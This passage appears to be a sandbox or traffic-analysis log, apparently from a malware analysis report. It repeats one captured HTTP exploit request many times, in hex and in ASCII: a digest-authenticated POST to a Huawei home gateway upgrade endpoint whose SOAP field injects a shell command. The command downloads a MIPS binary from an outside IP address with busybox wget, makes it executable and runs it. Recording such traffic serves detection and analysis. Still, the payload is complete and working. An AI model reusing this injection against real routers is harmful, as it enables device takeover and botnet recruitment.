2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * 